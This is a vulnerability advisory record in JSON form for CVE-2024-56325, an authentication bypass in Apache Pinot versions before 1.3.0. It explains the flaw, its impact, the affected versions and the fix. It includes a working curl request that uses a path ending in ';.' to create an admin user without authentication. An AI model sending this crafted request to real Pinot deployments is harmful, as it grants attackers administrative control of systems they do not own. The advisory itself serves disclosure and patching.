{"schema_version": "1.6.1", "id": "CVE-2024-56325", "summary": "Authentication bypass issue. If the path does not contain / and contain . authentication is not required", "details": "Authentication Bypass Vulnerability in Apache Pinot (CVE-2024-56325)\n\n\n\n\n\n\nApache Pinot versions prior to 1.3.0 contain an authentication bypass vulnerability affecting REST endpoints in the Controller and Broker components.\n\n\n\n\n\n\n\n\nDescription\n\n\n\n\n\n\nThe vulnerability is caused by improper handling of HTTP request paths containing matrix parameters (;) combined with dot (.) characters. Under certain crafted path conditions (for example, /users;.), the request could be incorrectly classified as an unprotected resource. As a result, authentication checks were skipped.\n\n\n\n\n\n\nThis may allow an unauthenticated attacker to invoke protected administrative APIs if the Pinot Controller or Broker endpoints are accessible.\n\n\n\n\n\n\nThis issue is classified as:\n\n\n\n\n  *  \nCWE-288: Authentication Bypass Using an Alternate Path or Channel\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nExample\n\n\n\n\n\n\nExpected behavior (authentication enforced):\n\n\n\n\ncurl -X POST -H \"Content-Type: application/json\" \\\n  -d '{\"username\":\"hack2\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"}' \\\n  http://{server_ip}:9000/users\n\n\n\n\nResponse:\n\n\n\n\n{\"code\":401,\"error\":\"HTTP 401 Unauthorized\"}\n\n\n\n\nCrafted request triggering bypass (pre-1.3.0 only):\n\n\n\n\ncurl -X POST -H \"Content-Type: application/json\" \\\n  -d '{\"username\":\"hack\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"}' \\\n  http://{server_ip}:9000/users;.\n\n\n\n\nIn vulnerable versions, this request could bypass authentication and succeed.\n\n\n\n\n\n\n\n\nImpact\n\n\n\n\n\n\nIf exploited, an unauthenticated attacker may gain administrative access, including the ability to create users and modify cluster configuration.\n\n\n\n\n\n\nThe vulnerability is only exploitable if:\n\n\n\n\n  *  \nAuthentication is enabled, and\n\n\n\n  *  \nController or Broker APIs are reachable by the attacker.\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nAffected Versions\n\n\n\n\n  *  \nApache Pinot versions earlier than 1.3.0\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nFixed Version\n\n\n\n\n  *  \nApache Pinot 1.3.0\n\n\n\n\n\n\n\n\n\n\n\n\nThe fix ensures matrix parameters are stripped from request paths before evaluating authentication requirements.\n\n\n\n\n\n\nUsers are strongly encouraged to upgrade to version 1.3.0 or later.", "affected": [{"ranges": [{"type": "SEMVER", "events": [{"introduced": "0"}, {"fixed": "1.3"}]}]}], "references": [{"type": "WEB", "url": "https://lists.apache.org/thread/ksf8qsndr1h66otkbjz2wrzsbw992r8v"}]}